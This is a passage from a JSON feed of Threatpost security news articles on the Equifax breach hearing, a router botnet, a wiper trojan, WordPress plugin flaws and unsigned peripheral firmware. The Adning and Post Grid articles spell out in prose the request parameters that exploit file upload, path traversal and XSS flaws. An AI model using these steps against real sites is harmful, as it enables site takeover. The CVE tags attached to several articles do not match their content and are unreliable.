reiterate that Canadian citizens were also impacted, although far fewer than initially thought. The company said there may have been up to 100,000 Canadians affected several weeks ago however upon closer inspection, only 8,000 Canadian consumers were affected by the breach.\n\nEquifax says its still analyzing exactly how many United Kingdom consumers have been affected by the breach and is in the middle discussions with regulators to determine how to notify them.\n\nDetails about the breach came out the day before Richard Smith, Equifax\u2019s former CEO, was scheduled to testify about the breach before the U.S. House Committee on Energy and Commerce Subcommittee on Digital Commerce and Consumer Protection. Smith, former Equifax chairman and chief executive, [retired last Tuesday](<https://threatpost.com/oracle-patches-apache-struts-reminds-users-to-update-equifax-bug/128151/>) in wake of the breach.\n\nIn a [written testimony (.PDF)](<http://docs.house.gov/meetings/IF/IF17/20171003/106455/HHRG-115-IF17-Wstate-SmithR-20171003.pdf>) released in tandem with the subcommittee hearing, Smith blamed the breach on a combination of \u201chuman error and technology failures.\u201d\n\n\u201cThese mistakes \u2013 made in the same chain of security systems designed with redundancies \u2013 allowed criminals to access over 140 million Americans\u2019 data,\u201d Smith wrote.\n\nIn the testimony Smith claimed that the U.S. Department of Homeland Security\u2019s Computer Emergency Readiness Team (U.S. CERT) notified Equifax on March 8 that [it needed to patch CVE-2017-5638](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>), the Apache Struts vulnerability that eventually led to the hack.\n\nEquifax requested the \u201capplicable personnel responsible\u201d update Apache Struts via email on March 9, something that should have been done within a 48 hour period, Smith said.\n\nThat was never done and according to Smith, the vulnerability wasn\u2019t picked up by internal scans designed to identify vulnerable systems carried out on March 15. The issue lingered for roughly two months until attackers accessed Equifax\u2019s systems on May 13 \u2013 and persisted until the company became aware of the attackers on July 30.\n\nGreg Walden (R-Ore.) pointed out some of Equifax\u2019s many missteps on Tuesday morning, including how Equifax\u2019s consumer facing website for the breach was put hosted on a separate domain from the main Equifax website, the confusion that spawned, and how on multiple occasions Equifax directed users to the wrong website.\n\n\u201cOn top of all the other issues, multiple times Equifax tweeted the wrong URL directing consumers to the wrong website to check if they were part of a breach,\u201d Walden said, \u201cTalk about ham-handed responses this is simply unacceptable and it makes me wonder if there was a breach response plan in place at all and if anyone was in charge of executing that plan.\u201d\n\nDuring another part of the hearing, Tim Murphy, a U.S. representative for Pennsylvania\u2019s 18th Congressional district, came back to that question. When told the company\u2019s original site couldn\u2019t handle the traffic is received, Murphy was befuddled.\n\n\u201cWhy wouldn\u2019t your website be able to handle this kind of traffic?\u201d Murphy asked, \u201cIt just doesn\u2019t make sense, a company your size and with your knowledge, doesn\u2019t understand how to handle traffic for over 100 million people, don\u2019t you use an Elastic cloud computing service that would\u2019ve accounted for this?\u201d\n\nSmith said the sheer amount of traffic Equifax\u2019s site received in wake of the breach made hosting a site on its domain impossible.\n\n\u201cThe environment the micro site is in is a cloud environment that\u2019s very, very scalable,\u201d Smith said. \u201cOur traditional environment could not handle 400 million consumer visits for three weeks.\u201d\n\nMurphy also grilled Smith on what took Equifax so long to patch the March vulnerability and if it\u2019s possible Equifax\u2019s internal scanning system could potentially miss another vulnerability.\n\n\u201cIf the patch only took a few days to apply why did Equifax fail to apply it in March when it was announced as critical?\u201d Murphy asked.\n\nSmith skirted the question and instead discussed the difficulties associated with patching.\n\n\u201cPatching can take a variety of time\u2026 it can take days or up to a week or more,\u201d Smith said, adding that he wasn\u2019t aware of the particular Struts vulnerability at the time.\n\nAt the end of the hearing, when pressed by Anna Eshoo, U.S. Representative for California\u2019s 18th congressional district, Smith described the process around patching again but did little to deviate from his prepared testimony.\n\n\u201cI want to know when they did it, when they took care of [the patch]\u201d Eshoo said.\n\n\u201cThey took care of it in July because we never found it,\u201d Smith said. \u201cWe had the human error, we did the scan, the technology never found it, in July we found suspicious activity, took the portal down, found the vulnerability, applied the patch.\u201d\n", "cvss3": {}, "published": "2017-10-03T15:27:08", "type": "threatpost", "title": "Equifax Says 145.5M Affected by Breach, Ex-CEO Testifies", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-10-03T15:27:08", "id": "THREATPOST:5E633FD1C6A5B5BB74F1B6A8399001A2", "href": "https://threatpost.com/equifax-says-145-5m-affected-by-breach-ex-ceo-testifies/128247/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-10-14T22:26:16", "description": "[![](https://media.threatpost.com/wp-content/uploads/sites/103/2020/04/16215737/Divycloud_225x188.jpg)](<https://register.gotowebinar.com/register/4136632530104301068?source=art>)The Mootbot botnet has been using a pair of zero-day exploits to compromise multiple types of fiber routers. According to researchers, other botnets have attempted to do the same, but have so far failed.\n\nAccording to researchers at NetLab 360, the operators of the Mootbot botnet in late February started to exploit a zero-day bug found in nine different types of fiber routers used to provide internet access and Wi-Fi to homes and businesses (including the Netlink GPON router). The flaw is a remote code-execution bug with a public proof-of-concept (PoC) exploit \u2013 but for it to be used successfully to compromise a target router, it must be paired with a second vulnerability.\n\n\u201cIt is likely most of the vendors are OEM products of the same original vendor,\u201d the firm explained in a [recent posting](<https://blog.netlab.360.com/multiple-fiber-routers-are-being-compromised-by-botnets-using-0-day-en/>). However, NetLab 360 said that it wouldn\u2019t release the original vendor\u2019s name nor details of the second bug, because the vendor told the security firm that it didn\u2019t see the bug as viable.\n\n\u201cOn March 17, we confirmed the exploit was a 0-day and reported the result to CNCERT,\u201d according to the analysis. \u201cWe also contacted the vendor but was told this problem should not be happening because the default config of the device should not have this issue (the reality is different). So they won\u2019t take this case from us.\u201d\n\nDespite that initial assessment, a PoC code for the bug emerged on ExploitDB a day later. And a day after that, on March 19, the firm saw attacks in the wild using the PoC to attempt to spread the Gafgyt botnet. A few days later, the botnet had adopted the PoC as part of a worming attempt to move from router to router. Meanwhile, on March 24, another wave of exploit attempts emerged using the PoC, this time trying to spread the Fbot botnet.\n\n\u201cThe PoC lefts out a crucial prerequisite \u2013 another vulnerability needs to be used together with this PoC for it to work,\u201d researchers explained. \u201cSo, a successful execution of the injected commands will not have the target device compromised.\u201d\n\nMoobot is a new botnet family based on [Mirai botnet](<https://threatpost.com/mirai-enterprise-systems/142889/>), which targets internet of things (IoT) devices. While most IoT botnets go after gear that may have weak or default passwords, Mootbot stands out for its use of zero-day exploits, researchers said. It\u2019s worth noting that the malware [was also seen in March](<https://threatpost.com/hackers-exploited-0-day-cctv-camera/154051/>) using multiple zero days to target LILIN DVR and IP cameras.\n\nThough it didn\u2019t release details of the second success factor in the kill chain, NetLab 360 recommended that to protect against the threat, users that have fiber-based internet access routers should check and update their device firmware, and check whether there are default accounts that should be disabled.\n\nJack Mannino, CEO at nVisium, told Threatpost that the [focus on routers](<https://threatpost.com/thousands-of-mikrotik-routers-hijacked-for-eavesdropping/137165/>) offers attackers certain advantages.\n\n\u201cControlling network infrastructure will always be an appealing attacker goal because of the springboard it provides for launching future attacks,\u201d he said. \u201cAs a software developer, it\u2019s important to consider that the networks your users access your product from may be compromised, and build this into your threat models. Whether it\u2019s the level of access it provides to network traffic, or the chokepoints and amplifiers for DDoS attacks they present, previous botnets, such as Mirai, gave us a glimpse into what these campaigns can achieve. More security teams focus on their Patch Tuesday fixes than updating the devices they frequently expose directly to the internet.\u201d\n\n**_Worried about your cloud security in the work-from-home era? On _****_April 23 at 2 p.m. ET_****_, join DivvyCloud and Threatpost for a FREE webinar, _**[**_A Practical Guide to Securing the Cloud in the Face of Crisis_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)**_. Get exclusive research insights and critical, advanced takeaways on how to avoid cloud disruption and chaos in the face of COVID-19 \u2013 and during all times of crisis. _**[**_Please register here_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)_** for this sponsored webinar.**_\n", "cvss3": {}, "published": "2020-04-20T20:51:59", "type": "threatpost", "title": "Mootbot Botnet Targets Fiber Routers with Dual Zero-Days", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-04-20T20:51:59", "id": "THREATPOST:E95F180BE3CA693890795666169A5F04", "href": "https://threatpost.com/mootbot-fiber-routers-zero-days/154962/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:26:51", "description": "A new Windows malware has emerged that makes disks unusable by overwriting the master boot record (MBR). It takes its cue from the COVID-19 pandemic, calling itself simply \u201cCoronavirus.\u201d\n\nOverwriting the MBR is the same trick that the infamous NotPetya wiper malware used in 2017 in a campaign that caused widespread, [global financial damage](<https://threatpost.com/pharmaceutical-giant-still-feeling-notpetyas-sting/127130/>).\n\nWorryingly, according to the SonicWall Capture Labs Threat Research team, the fresh malware strain is also a destructive trojan \u2014 though not as destructive as other wipers. And like its namesake, there\u2019s no obvious cure. In [a posting on Tuesday](<https://securitynews.sonicwall.com/xmlpost/coronavirus-trojan-overwriting-the-mbr/>), researchers explained that victims of the Coronavirus trojan find themselves with a gray screen and a blinking cursor with a simple message, \u201cYour computer has been trashed.\u201d\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nThe novel coronavirus, and the disease it causes, COVID-19, has provided a depth of fodder for cybercriminals looking to capitalize on the global concern around the pandemic. For instance, a recent spate of phishing attacks has used [the promise of financial relief](<https://threatpost.com/coronavirus-financial-relief-phishing-spike/154358/>) due to the disease as a lure. However, the operator behind this malware takes it one step further, going so far as to take the coronavirus as its name and infection theme.\n\nAs far as that infection routine, the malware can be delivered in any of the usual ways \u2013 as a malicious email attachment, file download, fake application and so on.\n\nUpon execution, the malware starts its process by installing a number of helper files, which are placed in a temporary folder. The malware cleaves tight to its pandemic theme: An installer (a helper file named \u201ccoronavirus.bat\u201d) sets up the attack by creating a hidden folder named \u201cCOVID-19\u201d on the victim machine. The previously dropped helper files are then moved there, in an effort to go unnoticed until its goal is achieved.\n\nAfter that, the installer disables Windows Task Manager and User Access Control (UAC) in a further stab at obfuscation, according to the analysis. It also changes the victim\u2019s wallpaper, and disables options to add or modify that wallpaper after the change is made. It also adds entries in registry for persistence, and then sets about rebooting to finish the installation.\n\nThe process run.exe creates a batch file named run.bat to ensure the registry modifications done by \u201ccoronavirus.bat\u201d are kept intact during the reboot process, according to SonicWall.\n\nAfter reboot, the infection executes two binaries. One, \u201cmainWindow.exe,\u201d displays a window with a picture of the coronavirus itself, with two buttons. At the top of the window, the victim is notified that \u201ccoronavirus has infected your PC!\u201d\n\nThe two buttons read \u201cRemove virus\u201d and \u201cHelp.\u201d The former does nothing when clicked; the latter brings up a pop-up that tells victims to \u201cnot wast [sic] your time\u201d because \u201cyou can\u2019t terminate this process!\u201d\n\nThe other binary carries out the meat of the attack: It\u2019s responsible for overwriting the MBR.\n\n\u201cThe original MBR is first backed up in the first sector before it is overwritten with new one, [and the] MBR is overwritten with the new code,\u201d according to the researchers.\n\nOnce the overwrite is complete, the victim\u2019s display is changed to a simple grey screen delivering the bad news:\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2020/04/01164031/corona-trojan-grey-screen.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/04/01164031/corona-trojan-grey-screen.png>)\n\nSonicWall told Threatpost in an email interview that it was able to analyze the sample after it was uploaded to VirusTotal. Thus, so far, there haven\u2019t been many instances of \u201cCoronavirus\u201d observed in the wild, and little in known in terms of targeting or what the spreading mechanisms are for the mysterious new malware.\n\nThe team also told Threatpost that the good news is that this is not as dangerous as other wiper strains.\n\n\u201cEven if the MBR is not restored\u2026data can still be accessed/recovered by mounting the drive,\u201d the firm noted. \u201cThe MBR [also] can be potentially restored, but it is not easy and [requires deep technical knowledge](<https://neosmart.net/wiki/fix-mbr/>).\u201d\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2020/03/24173101/DUO_320x50.jpg)](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>)\n\n_**Do you suffer from Password Fatigue? On [Wednesday April 8 at 2 p.m. ET](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) join **_**_Duo Security and Threatpost as we explore a [passwordless](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) future. This [FREE](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) webinar maps out a future where modern authentication standards like WebAuthn significantly reduce a dependency on passwords. We\u2019ll also explore how teaming with Microsoft can reduced reliance on passwords. [Please register here](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) and dare to ask, \u201c[Are passwords overrated?](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>)\u201d in this sponsored webinar. _**\n", "cvss3": {}, "published": "2020-04-01T21:07:22", "type": "threatpost", "title": "Wiper Malware Called \"Coronavirus\" Spreads Among Windows Victims", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-04-01T21:07:22", "id": "THREATPOST:F18124E38523CE6CF73ACDCF7DBF78BC", "href": "https://threatpost.com/wiper-malware-coronavirus-windows-victims/154368/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:08:58", "description": "Two high-severity vulnerabilities in Post Grid, a WordPress plugin with more than 60,000 installations, opens the door to site takeovers, according to researchers. To boot, nearly identical bugs are also found in Post Grid\u2019s sister plug-in, Team Showcase, which has 6,000 installations.\n\nThe issues are a cross-site scripting (XSS) flaw as well as a PHP object-injection issue. Both bugs are pending CVE numbers, and both are high-severity, rating 7.5 out of 10 on the CvSS vulnerability rating scale.\n\nPost Grid, true to its name, allows users to display their posts in a grid layout; meanwhile, Team Showcase offers a way to easily highlight an organization\u2019s team members. Both allowed the import of custom layouts, and used nearly identical \u2013 and vulnerable \u2013 functions for doing so, according to Ram Gall, researcher with Wordfence.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nThe XSS bug would allow an attacker to supply a source parameter pointing to a crafted malicious payload hosted elsewhere. The function would then open the file containing the payload, decode it and create a new page layout based on its contents.\n\n\u201cThe created layout included a custom_scripts section, and an attacker could add malicious JavaScript to the custom_css portion of this section,\u201d explained Gall, [in a posting](<https://www.wordfence.com/blog/2020/10/high-severity-vulnerabilities-in-post-grid-and-team-showcase-plugins/>) on Monday. \u201cThis would then be executed whenever an administrative user edited the layout or a visitor visited a page based on the layout.\u201d\n\nThe upshot is that attackers could use the malicious JavaScript to add a malicious administrator, add a backdoor to plugin or theme files, or steal the administrator\u2019s session information \u2013 all of which are paths to complete takeover of a site.\n\nTriggering an exploit is also somewhat trivial.\n\n\u201cIn both cases, a logged-in attacker with minimal permissions such as subscriber could trigger the functions by sending an AJAX request, with the action set to post_grid_import_xml_layouts for the Post Grid plugin or team_import_xml_layouts for the Team Showcase plugin, with each action triggering a function with the same name,\u201d Gall explained.\n\nThe second issue, the PHP object-injection bug, arises in the import function because it unserialized the payload supplied in the source parameter. An attacker could therefore execute arbitrary code, delete or write files, or perform any number of other actions which could lead to site takeover.\n\nTo trigger the flaw, \u201can attacker could craft a string that would be unserialized into an active PHP object,\u201d Gall explained. \u201cAlthough neither plugin utilized any vulnerable magic methods, if another plugin using a vulnerable magic method was installed, Object injection could be used by an attacker.\u201d\n\nBoth vulnerabilities would typically require the attacker to have an account with at least subscriber level privileges \u2013 but there\u2019s a loophole.\n\n\u201cHowever, sites using a plugin or theme that allowed unauthenticated visitors to execute arbitrary shortcodes would be vulnerable to unauthenticated attackers,\u201d Gall added.\n\nThe plugins\u2019 developer, PickPlugins, has issued patches, so web admins should upgrade as soon as possible. The fixed versions are Post Grid v. 2.0.73 and Team Showcase v. 1.22.16.\n\nThese are the latest in the line of faulty WordPress plugins that have come to light this year. In September, a high-severity flaw in the Email Subscribers & Newsletters plugin by Icegram [was found to affect](<https://threatpost.com/wordpress-plugin-flaw/159172/>) more than 100,000 WordPress websites.\n\n[Earlier in August](<https://threatpost.com/critical-flaws-wordpress-quiz-plugin-site-takeover/158379/>), a plugin that is designed to add quizzes and surveys to WordPress websites patched two critical vulnerabilities. The flaws could be exploited by remote, unauthenticated attackers to launch varying attacks \u2013 including fully taking over vulnerable websites. [Also in August,](<https://threatpost.com/newsletter-wordpress-plugin-site-takeover/158025/>) Newsletter, a WordPress plugin with more than 300,000 installations, was discovered to have a pair of vulnerabilities that could lead to code-execution and even site takeover.\n\nAnd, [researchers in July warned](<https://threatpost.com/critical-rce-flaw-wordpress-plugin-on-70k-sites/157824/>) of a critical vulnerability in a WordPress plugin called Comments \u2013 wpDiscuz, which is installed on more than 70,000 websites. The flaw gave unauthenticated attackers the ability to upload arbitrary files (including PHP files) and ultimately execute remote code on vulnerable website servers.\n\n[**On October 14 at 2 PM ET**](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)** Get the latest information on the rising threats to retail e-commerce security and how to stop them. **[**Register today**](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)** for this FREE Threatpost webinar, \u201c**[**Retail Security: Magecart and the Rise of e-Commerce Threats.**](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)**\u201d Magecart and other threat actors are riding the rising wave of online retail usage and racking up big numbers of consumer victims. Find out how websites can avoid becoming the next compromise as we go into the holiday season. Join us Wednesday, Oct. 14, 2-3 PM ET for this **[**LIVE **](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)**webinar.**\n", "cvss3": {}, "published": "2020-10-05T21:11:44", "type": "threatpost", "title": "Post Grid WordPress Plugin Flaws Allow Site Takeovers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-10-05T21:11:44", "id": "THREATPOST:8E52FA6620F4FFE6ED3A412867239F2B", "href": "https://threatpost.com/wordpress-plugin-flaws/159856/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:26:12", "description": "The Adning Advertising plugin for WordPress, a premium plugin with over 8,000 customers, contains a critical remote code-execution vulnerability with the potential to be exploited by unauthenticated attackers.\n\nThe plugin\u2019s author, Tunafish, has rolled out a patched version (v.1.5.6), which site owners should update to as soon as possible. No CVE was issued.\n\nThe bug could allow complete site takeover, earning it a 10 out of 10 on the CVSS bug-severity scale. Also, it has already been the subject of in-the-wild attacks, according to [an analysis](<https://www.wordfence.com/blog/2020/07/critical-vulnerabilities-patched-in-adning-advertising-plugin/>) from Wordfence issued on Wednesday. That said, the firm said the attacks so far have been limited in scope and scale.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nThe flaw exists in the Adning plugin\u2019s ability to allow users to upload banner images, researchers said.\n\n\u201cIn order to provide this functionality, it used an AJAX action, _ning_upload_image,\u201d according to the researchers. \u201cUnfortunately, this AJAX action was available with a nopriv_ hook, meaning that any visitor to the site could make use of it, even if they were not logged in. Additionally, the function called by this AJAX action also failed to make use of a capability check or a nonce check.\u201d\n\nThis function also allowed the user to supply the \u201callowed\u201d file types \u2013 which means that an unauthenticated attacker could upload malicious code by sending a POST request to wp-admin/admin-ajax.php.\n\nThis could be performed \u201cwith the action parameter set to _ning_upload_image the allowed_file_types set to php and a files parameter containing a malicious PHP file,\u201d researchers said. \u201cAlternatively, an attacker could set the allowed_file_types to zip and upload a compressed archive containing a malicious PHP file, which would be unzipped after upload.\u201d\n\n## **A Second Bug**\n\nWordfence researchers also found a second security vulnerability, which allows unauthenticated arbitrary file deletion via path traversal.\n\nCarrying a high-severity CVSS score of 8.7, this bug is also patched in v.1.5.6.\n\n\u201cIn order to delete any uploaded images, the plugin also registered another ajax action, _ning_remove_image, which also used a nopriv_ hook,\u201d according to the analysis. \u201cAs with the upload vulnerability, this function did not perform a capability check or a nonce check. As such it was possible for an unauthenticated attacker to delete arbitrary files using path traversal.\u201d\n\nAlso, according to Wordfence, if an attacker were able to delete the specific file wp-config.php, the site would be reset, offering attackers an opportunity to set it up again. They could use their own remote databases under their control, effectively replacing the site\u2019s content with their own content.\n\n\u201cThis might require an extra step of preparation, which is that the wp-content/uploads/path folder would need to exist,\u201d according to Wordfence. \u201cHowever, since the previously mentioned arbitrary file-upload vulnerability allowed for directory creation, this was not a major obstacle. Once the directory was created, an attacker could send a POST request to wp-admin/admin-ajax.php with the action parameter set to _ning_remove_image, the uid parameter set to /../../.. and the src parameter set to wp-config.php.\u201d\n\n## **WordPress Plugins: A Weak Link**\n\nWordPress plugins continue to crop up with concerning vulnerabilities that put sites at risk. In May for instance, Page Builder by SiteOrigin, a WordPress plugin with a million active installs that\u2019s used to build websites via a drag-and-drop function, [was found to harbor](<https://threatpost.com/wordpress-page-builder-bugs-takeover/155659/>) two flaws that could allow full site takeover.\n\nMeanwhile in April, it was revealed that legions of website visitors could be infected with drive-by malware, among other issues, thanks to a [CSRF bug in Real-Time Search and Replace](<https://threatpost.com/wordpress-plugin-bug-100k-websites-compromise/155230/>). Also that month, a pair of security vulnerabilities (one of them critical), in the WordPress search engine optimization (SEO) plugin known as Rank Math, [were found](<https://threatpost.com/critical-wordpress-plugin-bug-lock-admins-out/154354/>). They could allow remote cybercriminals to elevate privileges and install malicious redirects onto a target site, according to researchers. RankMath is a WordPress plugin with more than 200,000 installations.\n\nIn March, another critical vulnerability in a WordPress plugin known as \u201cThemeREX Addons\u201d [was found](<https://threatpost.com/themerex-wordpress-plugin-remote-code-execution/153592/>) that could open the door for remote code execution in 44,000 websites.\n\nAlso in March, two vulnerabilities \u2013 including a high-severity flaw \u2013 [were patched](<https://threatpost.com/wordpress-plugin-bug-popup-builder/153715/>) in a popular WordPress plugin called Popup Builder. The more severe flaw could enable an unauthenticated attacker to infect malicious JavaScript into a popup \u2013 potentially opening up more than 100,000 websites to takeover.\n\nAnd in February, popular WordPress plugin Duplicator, which has more than 1 million active installations, [was discovered to have](<https://www.wordfence.com/blog/2020/03/zero-day-vulnerability-in-themerex-addons-now-patched/>) an unauthenticated arbitrary file download vulnerability that was being attacked. And, earlier that month, a critical flaw in a popular WordPress plugin that helps make websites compliant with the General Data Protection Regulation (GDPR) [was disclosed](<https://threatpost.com/critical-wordpress-plugin-bug-afflicts-700k-sites/152871/>). The flaw could enable attackers to modify content or inject malicious JavaScript code into victim websites. It affected 700,000 sites.\n\n**_BEC and enterprise email fraud is surging, but DMARC can help \u2013 if it\u2019s done right. On July 15 at 2 p.m. ET, join Valimail Global Technical Director Steve Whittle and Threatpost for a _**[**_FREE webinar_**](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>)**_, \u201cDMARC: 7 Common Business Email Mistakes.\u201d This technical \u201cbest practices\u201d session will cover constructing, configuring, and managing email authentication protocols to ensure your organization is protected. _**[**_Click here to register_**](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>)**_ for this Threatpost webinar, sponsored by Valimail._**\n", "cvss3": {}, "published": "2020-07-08T20:12:05", "type": "threatpost", "title": "Advertising Plugin for WordPress Threatens Full Site Takeovers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-07-08T20:12:05", "id": "THREATPOST:49EFC5B6CFCA04F105A001AAFED52548", "href": "https://threatpost.com/advertising-plugin-wordpress-full-site-takeovers/157283/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:30:12", "description": "Fresh firmware vulnerabilities in Wi-Fi adapters, USB hubs, trackpads and cameras are putting millions of peripheral devices in danger of a range of cyberattacks, according to research from Eclypsium.\n\nTouchPad and TrackPoint firmware in Lenovo Laptops, HP Wide Vision FHD camera firmware in HP laptops and the Wi-Fi adapter on Dell XPS laptops were all found to lack secure firmware update mechanisms with proper code-signing.\n\n\u201cSoftware and network vulnerabilities are often the more-obvious focus of organizations\u2019 security priorities, but firmware vulnerabilities could give adversaries full control over the compromised device,\u201d Katie Teitler, senior analyst at TAG Cyber, said via email. \u201cThis could lead to implanted backdoors, network traffic sniffing, data exfiltration and more. Unfortunately, though, firmware vulnerabilities can be harder to detect and more difficult to patch.\u201d\n\n## Unsigned Firmware Updates: A Growing Problem\n\nFirmware for peripherals can be burned into the integrated circuit of the device itself, or the component may have its own flash memory where firmware is stored. Firmware can also be dynamically provided by the operating system at boot time. Regardless of the implementation approach, firmware is used as the device-specific operating system for the peripheral in question, and can provide criminals with a rich attack surface if found to be vulnerable.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\n\u201cMany peripheral devices do not verify that firmware is properly signed with a high-quality public/private key before running the code,\u201d explained researchers at Eclypsium, in vulnerability research [released on Tuesday](<https://eclypsium.com/2020/2/18/unsigned-peripheral-firmware/>). \u201cThis means that these components have no way to validate that the firmware loaded by the device is authentic and should be trusted. An attacker could simply insert a malicious or vulnerable firmware image, which the component would blindly trust and run.\u201d\n\nThe scenario for an attack is thus a simple one. First, an attacker gains access to a device via any method, be it physical access, malware that allows remote code execution and so on, and, with basic user privileges, the attacker can write malicious firmware to a vulnerable component. If the component doesn\u2019t require the firmware to be properly signed, the attacker\u2019s code is loaded. Depending on the peripheral in question, this can lead to a range of malicious activity.\n\n\u201cFor example, malicious firmware on a network adapter could allow an attacker to sniff, copy, redirect or alter traffic leading to a loss of data, man-in-the-middle and other attacks,\u201d according to the research. \u201cPCI-based devices could enable [Direct Memory Access (DMA) attacks](<https://threatpost.com/dell-hp-memory-access-bugskernel-privileges/152369/>) that could easily steal data or take full control over the victim system. Cameras could be used to capture data from the user\u2019s environment, while a compromised hard drive could allow the attacker to hide code and tools without being seen by the operating system.\u201d\n\nFurther, firmware attacks allow malicious activity to fly under the radar of endpoint protections; as recently seen in the [latest campaigns using the RobbinHood ransomware](<https://threatpost.com/byo-bug-windows-kernel-outdated-driver/152762/>), vulnerable drivers can be used to bypass security protections and enable ransomware to attack without interference.\n\nJesse Michael, principal researcher at Eclypsium, told Threatpost that the kinds of attacks that these bugs enable are not insignificant. For instance, the Black Energy attack that brought down part of the power grid in Ukraine used an unsigned firmware update to break serial-to-Ethernet adapters that were used to control relays.\n\n\u201cA similar incident occurred with Saudi Aramco,\u201d he said. \u201cThis made the system much harder to bring back online.\u201d He added that firmware-based attacks have seen a 7.5-time increase in firmware/hardware CVEs from three years ago.\n\n## New Vulnerabilities\n\nEclypsium researchers analyzed a Lenovo ThinkPad X1 Carbon 6th Gen laptop, which contains two vulnerable firmware mechanisms: Touchpad firmware (pr2812761-tm3288-011-0808.img) and TrackPoint firmware (PSG5E5_RANKA_fv06.bin).\n\n\u201cWe discovered that the Touchpad and TrackPoint use insecure firmware update mechanisms,\u201d according to the research. \u201cSpecifically, cryptographic signature verification was not required at the device level before firmware updates were applied. This lack of control made it possible to modify the firmware images through software to run arbitrary malicious code within these components.\u201d\n\nMeanwhile, the firmware updates distributed by HP for the HP Wide Vision FHD camera found in the HP Spectre x360 Convertible 13-ap0xxx laptop are unencrypted and lack authenticity checks, Eclypsium noted. The device\u2019s firmware updater is composed of SunplusIT\u2019s Windows-based firmware update tool along with the firmware image, and both have issues.\n\n\u201cThe firmware image does not include any form of cryptographic signature or other authenticity information,\u201d according to the report. \u201cThe Windows-based firmware update tool accepts firmware files that have been modified to adjust USB descriptor contents. This ability to modify USB descriptors can be leveraged to disable the device or cause it to be identified as a different type of USB device. Once additional details of the processor architecture are discovered, the camera module behavior can be altered to be malicious.\u201d\n\nAlso, the SunplusIT firmware updater can successfully update a device even as a normal user, rather than requiring administrator access \u2013 a violation of best practices.\n\nEclypsium researchers also found that the firmware of the Wi-Fi adapter on Dell XPS 15 9560 laptops running Windows 10 has a bug. While Windows 10 will confirm that the drivers are correctly signed, that\u2019s where the security checks stop. So, if the drivers are correctly signed, a small certificate icon is displayed next to the driver when viewed in the device manager. If they aren\u2019t correctly signed, a user can still successfully load them \u2013 the icon merely goes away. This means that a privileged attacker could easily replace driver files.\n\nAnd finally, the researchers also took a look at the Linux Vendor Firmware Service, which is a secure portal that allows hardware vendors to upload firmware updates. An analysis showed multiple insecure updates and drivers.\n\n\u201cFrom this resource we can focus specifically on update protocols and easily review which are signed and which are not,\u201d the researchers wrote. \u201cWhile we can see that some of the update protocols are related to transport, many others are protocols used for the actual update process. For example, VLI USB Hub firmware is unsigned.\u201d\n\n## Vendor Response\n\nEclypsium researchers notified HP of the webcam firmware vulnerability on August 4, and Lenovo of the TouchPad/TrackPoint vulnerability on Lenovo on June 13.\n\n\u201cWe expect some vendors will issue CVEs, but none have as of yet,\u201d Jesse Michael, principal researcher at Eclypsium, told Threatpost. \u201cFor these peripherals, the OEMs (HP and Lenovo) have to work with their suppliers to develop fixes. From what we\u2019ve seen, most of these existing components were initially designed to have unsigned firmware, making them inherently vulnerable. Our interactions with these OEMs lead us to expect that future systems will have firmware update authentication requirements built in.\u201d\n\nEclypsium also reported the Wi-Fi issue to both Qualcomm, who provides the chipset and driver for the wireless card, and to Microsoft, which checks that such drivers are signed.\n\n\u201cQualcomm responded that their chipset is subordinate to the processor, and that the software running on the CPU is expected to take responsibility for validating firmware,\u201d Michael said. \u201cThey stated that there was no plan to add signature verification for these chips. However, Microsoft responded that it was up to the device vendor to verify firmware that is loaded into the device.\u201d The result is that this will likely go unaddressed, since each is pointing the responsibility back to the other.\n\nBottom line: Unsigned firmware in peripheral devices remains a highly overlooked aspect of cybersecurity, and provides multiple pathways for malicious actors to compromise laptops and servers.\n\n\u201cOnce firmware on any of these components is infected, the malware stays undetected by any software security controls,\u201d Michael 